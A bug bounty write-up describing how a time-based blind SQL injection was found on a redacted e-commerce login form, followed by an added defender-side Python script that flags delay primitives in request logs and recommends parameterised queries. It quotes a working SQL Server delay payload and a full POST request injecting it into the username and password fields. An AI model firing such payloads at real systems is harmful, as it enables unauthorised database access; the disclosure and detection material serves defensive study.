Yeah, First Time I Found Time-Based SQL-i or Blind SQL-i.

Amit Kumar Biswas @Amitlt2
2 min read · Nov 13, 2020


Hello Hackers!!

Hope You Guys are fine & your family too…

As you guys know, I never hunt any XSS, IDOR & CSRF in public programs. Every time I got a duplicate issue :(

My target is an e-commerce web app, so let's call it Redacted.com

I tried hard to find some bugs like Low-hanging Fruits or something like P1/P2 but I didn’t get anything.

Aditya Shende motivates me to do something special and he said don’t stop!!!

It's Hero Time

Time-Based SQL-INJECTION:-

Time-based SQL Injection is an inferential SQL Injection technique that relies on sending an SQL query to the database which forces the database to wait for a specified amount of time (in seconds) before responding. The response time will indicate to the attacker whether the result of the query is TRUE or FALSE.

Here I found a login panel, but what could I do with it? I didn't have any credentials, so I randomly intercepted the request and sent it to the Repeater. There were two input fields, asking me for a username and a password. Randomly, I put ABC in the username and in the password. After that, the response came back in 718 millis.

In the username and password fields, I pasted a time-based SQL-i payload like this:

";WAITFOR DELAY '0:0:1'--

Observe the delay in Response

How can I exploit this

POST /login3.jsp HTTP/1.1
Host: Redacted.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:77.0) Gecko/20100101 Firefox/77.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 29
Origin: https://Redacted.com
Connection: close
Referer: https://Redacted.com/login.jsp
Cookie: JSESSIONID=3AF77827E98029896976FBBF7B87138E
Upgrade-Insecure-Requests: 1

username=";WAITFOR DELAY '0:0:1'--&password=";WAITFOR DELAY '0:0:1'--

Impact:-

The impact SQL injection can have on a business is far-reaching. A successful attack may result in the unauthorized viewing of user lists, the deletion of entire tables, and, in certain cases, the attacker gaining administrative rights to a database, all of which are highly detrimental to a business.
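A defender-side view of the request above, as an added example that is not part of the original post: it decodes form bodies from request logs, flags time-delay SQL primitives in any field, and uses the response time to separate inert probes from likely executed injections. The function names, the 500 ms slack and the sample records are assumptions made for illustration, and the pattern list goes beyond the post's `WAITFOR DELAY` to cover the MySQL and PostgreSQL equivalents.

```python
import re
from urllib.parse import parse_qsl

# Time-delay primitives: WAITFOR DELAY is the one in this write-up (SQL Server);
# the others are the equivalents for MySQL and PostgreSQL.
DELAY_RE = re.compile(
    r"waitfor\s+delay\s*'?\d+:\d+:\d+|\bsleep\s*\(|\bpg_sleep\s*\(|\bbenchmark\s*\(",
    re.IGNORECASE,
)

def delay_params(body):
    """Return names of form fields whose decoded value holds a delay primitive."""
    fields = parse_qsl(body, keep_blank_values=True)
    return [name for name, value in fields if DELAY_RE.search(value)]

def triage(records, baseline_ms, slack_ms=500):
    """Classify each (path, body, elapsed_ms) record that carries a delay primitive.

    'probe'     : primitive seen, response time normal (the input was inert)
    'confirmed' : primitive seen AND response slower than baseline + slack,
                  i.e. the database very likely executed the injected delay
    """
    findings = []
    for path, body, elapsed_ms in records:
        hits = delay_params(body)
        if not hits:
            continue  # slow but clean requests are not SQLi evidence
        slow = elapsed_ms > baseline_ms + slack_ms
        findings.append((path, hits, "confirmed" if slow else "probe"))
    return findings

# Constructed sample records: (path, urlencoded body, response time in ms).
SAMPLE = [
    ("/login3.jsp", "username=ABC&password=ABC", 718),
    ("/login3.jsp", "username=%22%3BWAITFOR+DELAY+%270%3A0%3A1%27--&password=ABC", 1790),
    ("/login3.jsp", "username=bob&password=%27%3B+waitfor%20delay+%270%3A0%3A5%27--", 702),
    ("/search.jsp", "q=how+to+sleep+better", 2400),
]

if __name__ == "__main__":
    for finding in triage(SAMPLE, baseline_ms=718):
        print(finding)
```

Detection of this kind is a backstop. The fix for the login query itself is to bind the username and password as parameters (a `PreparedStatement` in JSP/JDBC) instead of concatenating them into the SQL string.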

Reported

Got Triage with 20 POINTS

Happy Hacking

Sharing is Caring

Thanks to Aditya Shende

#BugBounty #BugCrowd #CyberSecurity #ViehGroup

Written by Amit Kumar Biswas @Amitlt2

Cyber Security Analyst at @avalanceGlobalSolutions | Security Researcher in | Cyber Security Researcher in Microsoft & Bugcrowd | R&D in Smart Contract |
